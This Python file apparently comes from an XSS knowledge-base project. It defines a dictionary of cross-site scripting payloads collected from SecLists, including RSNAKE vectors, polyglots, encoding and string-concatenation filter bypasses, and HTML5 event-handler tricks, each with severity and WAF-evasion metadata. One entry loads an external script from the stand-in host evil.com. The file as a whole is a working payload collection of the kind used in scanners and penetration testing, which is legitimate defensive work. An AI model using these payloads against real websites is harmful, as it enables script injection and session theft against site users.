#!/usr/bin/env python3

"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26 UTC
Status: Created
Telegram: https://t.me/EasyProTech

Source: SecLists
URL: https://github.com/danielmiessler/SecLists
License: MIT
Authors: Daniel Miessler, Jason Haddix, g0tmi1k, Ignacio Portal

XSS payloads from SecLists Fuzzing/XSS collections.
Includes: RSNAKE classic, Jhaddix payloads, Polyglots, and more.
"""

from ..models import Encoding, PayloadEntry, Reliability, Severity


SECLISTS_XSS_PAYLOADS = {
    # === RSNAKE Classic Payloads ===
    # From the legendary RSNAKE XSS Cheat Sheet
    "sl-rsnake-img-src-js": PayloadEntry(
        payload="<IMG SRC=\"javascript:alert('XSS');\">",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - img src javascript",
        tags=["seclists", "rsnake", "classic", "img"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-rsnake-img-src-js-noq": PayloadEntry(
        payload="<IMG SRC=javascript:alert('XSS')>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - img src javascript no quotes",
        tags=["seclists", "rsnake", "classic", "img", "no-quotes"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-rsnake-img-src-case": PayloadEntry(
        payload="<IMG SRC=JaVaScRiPt:alert('XSS')>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - mixed case javascript",
        tags=["seclists", "rsnake", "classic", "case-insensitive"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "sl-rsnake-img-encode-tab": PayloadEntry(
        payload="<IMG SRC=\"jav\tascript:alert('XSS');\">",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - embedded tab in javascript",
        tags=["seclists", "rsnake", "classic", "tab", "obfuscation"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "sl-rsnake-img-encode-newline": PayloadEntry(
        payload="<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - encoded newline in javascript",
        tags=["seclists", "rsnake", "classic", "newline", "entity"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.HTML_ENTITIES,
        waf_evasion=True,
    ),
    "sl-rsnake-img-encode-cr": PayloadEntry(
        payload="<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - encoded carriage return",
        tags=["seclists", "rsnake", "classic", "carriage-return", "entity"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.HTML_ENTITIES,
        waf_evasion=True,
    ),
    "sl-rsnake-img-multiline": PayloadEntry(
        payload="<IMG\nSRC\n=\n\"\nj\na\nv\na\ns\nc\nr\ni\np\nt\n:\na\nl\ne\nr\nt\n(\n'\nX\nS\nS\n'\n)\n\"\n>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - multiline obfuscation",
        tags=["seclists", "rsnake", "classic", "multiline", "obfuscation"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "sl-rsnake-null-char": PayloadEntry(
        payload='perl -e \'print "<IMG SRC=java\\0script:alert(\\"XSS\\")>";\'',
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - null character injection",
        tags=["seclists", "rsnake", "classic", "null-byte"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "sl-rsnake-img-dynsrc": PayloadEntry(
        payload="<IMG DYNSRC=\"javascript:alert('XSS')\">",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - dynsrc attribute (IE)",
        tags=["seclists", "rsnake", "classic", "dynsrc", "ie"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        browser_support=["ie"],
    ),
    "sl-rsnake-img-lowsrc": PayloadEntry(
        payload="<IMG LOWSRC=\"javascript:alert('XSS')\">",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - lowsrc attribute",
        tags=["seclists", "rsnake", "classic", "lowsrc"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
    ),
    "sl-rsnake-vbscript": PayloadEntry(
        payload="<IMG SRC='vbscript:msgbox(\"XSS\")'>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - vbscript (IE)",
        tags=["seclists", "rsnake", "classic", "vbscript", "ie"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        browser_support=["ie"],
    ),
    "sl-rsnake-livescript": PayloadEntry(
        payload='<IMG SRC="livescript:[code]">',
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - livescript (Netscape)",
        tags=["seclists", "rsnake", "classic", "livescript", "legacy"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
    ),
    "sl-rsnake-mocha": PayloadEntry(
        payload='<IMG SRC="mocha:[code]">',
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - mocha (Netscape)",
        tags=["seclists", "rsnake", "classic", "mocha", "legacy"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
    ),
    "sl-rsnake-meta-refresh": PayloadEntry(
        payload='<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'XSS\');">',
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - meta refresh javascript",
        tags=["seclists", "rsnake", "classic", "meta", "refresh"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
    ),
    "sl-rsnake-meta-dataurl": PayloadEntry(
        payload='<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">',
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - meta refresh data URL",
        tags=["seclists", "rsnake", "classic", "meta", "data-url", "base64"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.BASE64,
        waf_evasion=True,
    ),
    "sl-rsnake-table-bg": PayloadEntry(
        payload="<TABLE BACKGROUND=\"javascript:alert('XSS')\">",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - table background",
        tags=["seclists", "rsnake", "classic", "table", "background"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
    ),
    "sl-rsnake-td-bg": PayloadEntry(
        payload="<TD BACKGROUND=\"javascript:alert('XSS')\">",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - td background",
        tags=["seclists", "rsnake", "classic", "td", "background"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
    ),
    "sl-rsnake-div-bg": PayloadEntry(
        payload="<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - div background-image",
        tags=["seclists", "rsnake", "classic", "div", "css", "background-image"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
    ),
    "sl-rsnake-div-width": PayloadEntry(
        payload="<DIV STYLE=\"width: expression(alert('XSS'));\">",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - CSS expression (IE)",
        tags=["seclists", "rsnake", "classic", "css", "expression", "ie"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        browser_support=["ie"],
    ),
    "sl-rsnake-style-tag": PayloadEntry(
        payload="<STYLE>@im\\port'\\ja\\televasc\\teleript:alert(\"XSS\")';</STYLE>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - style import bypass",
        tags=["seclists", "rsnake", "classic", "style", "import"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "sl-rsnake-input-onfocus": PayloadEntry(
        payload='<INPUT TYPE="IMAGE" SRC="javascript:alert(\'XSS\');">',
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - input image src",
        tags=["seclists", "rsnake", "classic", "input", "image"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
    ),
    "sl-rsnake-bgsound": PayloadEntry(
        payload="<BGSOUND SRC=\"javascript:alert('XSS');\">",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - bgsound (IE)",
        tags=["seclists", "rsnake", "classic", "bgsound", "ie"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        browser_support=["ie"],
    ),
    "sl-rsnake-br-size": PayloadEntry(
        payload="<BR SIZE=\"&{alert('XSS')}\">",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - br size (Netscape)",
        tags=["seclists", "rsnake", "classic", "br", "legacy"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
    ),
    "sl-rsnake-link-stylesheet": PayloadEntry(
        payload='<LINK REL="stylesheet" HREF="javascript:alert(\'XSS\');">',
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="RSNAKE classic - link stylesheet",
        tags=["seclists", "rsnake", "classic", "link", "stylesheet"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
    ),
    "sl-rsnake-xss-locator": PayloadEntry(
        payload="'';!--\"<XSS>=&{()}",
        contexts=["html_content", "javascript"],
        severity=Severity.MEDIUM,
        cvss_score=5.0,
        description="RSNAKE XSS locator/probe string",
        tags=["seclists", "rsnake", "classic", "locator", "probe"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
    ),
    # === Jhaddix Payloads ===
    "sl-jhaddix-svg-onload": PayloadEntry(
        payload="<svg/onload=alert('XSS')>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Jhaddix - minimal svg onload",
        tags=["seclists", "jhaddix", "svg", "minimal"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-jhaddix-img-onerror": PayloadEntry(
        payload="<img src=x onerror=alert('XSS')/>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Jhaddix - minimal img onerror",
        tags=["seclists", "jhaddix", "img", "minimal"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-jhaddix-body-onload": PayloadEntry(
        payload="<body onload=alert('XSS')>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Jhaddix - body onload",
        tags=["seclists", "jhaddix", "body", "onload"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-jhaddix-input-autofocus": PayloadEntry(
        payload="<input autofocus onfocus=alert('XSS')>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Jhaddix - input autofocus onfocus",
        tags=["seclists", "jhaddix", "input", "autofocus"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-jhaddix-marquee": PayloadEntry(
        payload="<marquee onstart=alert('XSS')>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Jhaddix - marquee onstart",
        tags=["seclists", "jhaddix", "marquee"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
    ),
    "sl-jhaddix-details": PayloadEntry(
        payload="<details open ontoggle=alert('XSS')>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Jhaddix - details ontoggle",
        tags=["seclists", "jhaddix", "details", "html5"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-jhaddix-video-onerror": PayloadEntry(
        payload="<video src=x onerror=alert('XSS')>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Jhaddix - video onerror",
        tags=["seclists", "jhaddix", "video", "html5"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-jhaddix-audio-onerror": PayloadEntry(
        payload="<audio src=x onerror=alert('XSS')>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Jhaddix - audio onerror",
        tags=["seclists", "jhaddix", "audio", "html5"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-jhaddix-object-onerror": PayloadEntry(
        payload="<object onerror=alert('XSS')>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Jhaddix - object onerror",
        tags=["seclists", "jhaddix", "object"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
    ),
    # === Polyglot Payloads ===
    "sl-polyglot-garethheyes": PayloadEntry(
        payload="jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcLiCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e",
        contexts=["html_content", "javascript", "html_attribute", "url", "css"],
        severity=Severity.CRITICAL,
        cvss_score=9.0,
        description="Gareth Heyes ultimate polyglot",
        tags=["seclists", "polyglot", "garethheyes", "universal"],
        reliability=Reliability.HIGH,
        encoding=Encoding.MIXED,
        waf_evasion=True,
    ),
    "sl-polyglot-mazin": PayloadEntry(
        payload="';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>",
        contexts=["html_content", "javascript", "html_attribute"],
        severity=Severity.CRITICAL,
        cvss_score=9.0,
        description="Mazin Ahmed polyglot",
        tags=["seclists", "polyglot", "mazin", "fromCharCode"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "sl-polyglot-0x6f": PayloadEntry(
        payload="-->'\"--></style></script><svg/onload=alert()>",
        contexts=["html_content", "javascript", "css"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="0x6f simple context-break polyglot",
        tags=["seclists", "polyglot", "simple", "context-break"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "sl-polyglot-ashar": PayloadEntry(
        payload='javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html " onmouseover=/*&lt;svg/*/onload=alert()//>',
        contexts=["html_content", "javascript", "html_attribute"],
        severity=Severity.CRITICAL,
        cvss_score=9.0,
        description="Ashar Javed polyglot",
        tags=["seclists", "polyglot", "ashar", "complex"],
        reliability=Reliability.HIGH,
        encoding=Encoding.MIXED,
        waf_evasion=True,
    ),
    # === Intruder/Fuzzing Payloads ===
    "sl-fuzz-script-simple": PayloadEntry(
        payload="<script>alert(1)</script>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Simple script fuzzing payload",
        tags=["seclists", "fuzzing", "script", "simple"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-fuzz-script-src": PayloadEntry(
        payload="<script src=//evil.com/xss.js></script>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="External script fuzzing payload",
        tags=["seclists", "fuzzing", "script", "external"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-fuzz-iframe-js": PayloadEntry(
        payload="<iframe src=javascript:alert(1)>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Iframe javascript fuzzing payload",
        tags=["seclists", "fuzzing", "iframe", "javascript"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-fuzz-img-quote-break": PayloadEntry(
        payload='"><img src=x onerror=alert(1)>',
        contexts=["html_attribute"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Quote-breaking img fuzzing payload",
        tags=["seclists", "fuzzing", "img", "quote-break"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-fuzz-tag-break": PayloadEntry(
        payload="'><script>alert(1)</script>",
        contexts=["html_attribute"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Tag-breaking script fuzzing payload",
        tags=["seclists", "fuzzing", "script", "tag-break"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-fuzz-event-inject": PayloadEntry(
        payload='" onmouseover=alert(1) x="',
        contexts=["html_attribute"],
        severity=Severity.MEDIUM,
        cvss_score=6.5,
        description="Event injection fuzzing payload",
        tags=["seclists", "fuzzing", "event", "injection"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-fuzz-js-escape": PayloadEntry(
        payload="';alert(1)//",
        contexts=["javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="JS string escape fuzzing payload",
        tags=["seclists", "fuzzing", "javascript", "escape"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-fuzz-js-template": PayloadEntry(
        payload="${alert(1)}",
        contexts=["javascript", "template"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Template literal fuzzing payload",
        tags=["seclists", "fuzzing", "template", "es6"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    # === HTML5 Specific ===
    "sl-html5-svg-animate": PayloadEntry(
        payload="<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="HTML5 SVG animate onbegin",
        tags=["seclists", "html5", "svg", "animate"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-html5-svg-set": PayloadEntry(
        payload="<svg><set onbegin=alert(1) attributeName=x>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="HTML5 SVG set onbegin",
        tags=["seclists", "html5", "svg", "set"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-html5-math-xlink": PayloadEntry(
        payload='<math><a xlink:href="javascript:alert(1)">click</a></math>',
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="HTML5 MathML xlink",
        tags=["seclists", "html5", "mathml", "xlink"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
    ),
    "sl-html5-form-button": PayloadEntry(
        payload="<form><button formaction=javascript:alert(1)>XSS</button>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="HTML5 form button formaction",
        tags=["seclists", "html5", "form", "formaction"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-html5-isindex": PayloadEntry(
        payload="<isindex type=image src=1 onerror=alert(1)>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="HTML5 isindex (deprecated)",
        tags=["seclists", "html5", "isindex", "deprecated"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
    ),
    # === Encoding Variations ===
    "sl-enc-unicode-full": PayloadEntry(
        payload="<script>\\u0061\\u006c\\u0065\\u0072\\u0074(1)</script>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Full unicode escape",
        tags=["seclists", "encoding", "unicode", "full"],
        reliability=Reliability.HIGH,
        encoding=Encoding.UNICODE,
        waf_evasion=True,
    ),
    "sl-enc-hex-full": PayloadEntry(
        payload="<script>\\x61\\x6c\\x65\\x72\\x74(1)</script>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Full hex escape",
        tags=["seclists", "encoding", "hex", "full"],
        reliability=Reliability.HIGH,
        encoding=Encoding.HEX,
        waf_evasion=True,
    ),
    "sl-enc-octal": PayloadEntry(
        payload="<script>\\141\\154\\145\\162\\164(1)</script>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Octal escape",
        tags=["seclists", "encoding", "octal"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.OTHER,  # Octal escape
        waf_evasion=True,
    ),
    "sl-enc-html-decimal": PayloadEntry(
        payload="<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="HTML decimal entity encoding",
        tags=["seclists", "encoding", "html", "decimal"],
        reliability=Reliability.HIGH,
        encoding=Encoding.HTML_DECIMAL,
        waf_evasion=True,
    ),
    "sl-enc-html-hex": PayloadEntry(
        payload="<img src=x onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;(1)>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="HTML hex entity encoding",
        tags=["seclists", "encoding", "html", "hex"],
        reliability=Reliability.HIGH,
        encoding=Encoding.HTML_PADDED_HEX,
        waf_evasion=True,
    ),
    "sl-enc-base64-eval": PayloadEntry(
        payload="<img src=x onerror=eval(atob('YWxlcnQoMSk='))>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Base64 encoded with eval/atob",
        tags=["seclists", "encoding", "base64", "eval"],
        reliability=Reliability.HIGH,
        encoding=Encoding.BASE64,
        waf_evasion=True,
    ),
    # === String Manipulation ===
    "sl-str-concat": PayloadEntry(
        payload="<script>al'+'ert(1)</script>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="String concatenation bypass",
        tags=["seclists", "string", "concat", "bypass"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "sl-str-fromcharcode": PayloadEntry(
        payload="<script>String.fromCharCode(97,108,101,114,116)(1)</script>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="fromCharCode bypass",
        tags=["seclists", "string", "fromCharCode", "bypass"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "sl-str-constructor": PayloadEntry(
        payload="<script>[].constructor.constructor('alert(1)')()</script>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Constructor chain bypass",
        tags=["seclists", "string", "constructor", "bypass"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "sl-str-eval-name": PayloadEntry(
        payload="<script>window['al'+'ert'](1)</script>",
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Window property access bypass",
        tags=["seclists", "string", "window", "bypass"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    # === Modern Browser Vectors ===
    "sl-modern-srcdoc": PayloadEntry(
        payload='<iframe srcdoc="<script>alert(1)</script>">',
        contexts=["html_content"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Iframe srcdoc XSS",
        tags=["seclists", "modern", "iframe", "srcdoc"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-modern-template": PayloadEntry(
        payload="`${alert(1)}`",
        contexts=["javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Template literal XSS",
        tags=["seclists", "modern", "template", "es6"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-modern-import": PayloadEntry(
        payload="import('data:text/javascript,alert(1)')",
        contexts=["javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Dynamic import XSS",
        tags=["seclists", "modern", "import", "es6"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
    "sl-modern-object-assign": PayloadEntry(
        payload="Object.assign(document.body,{innerHTML:'<img src=x onerror=alert(1)>'})",
        contexts=["javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Object.assign DOM mutation",
        tags=["seclists", "modern", "object", "assign"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
    ),
}
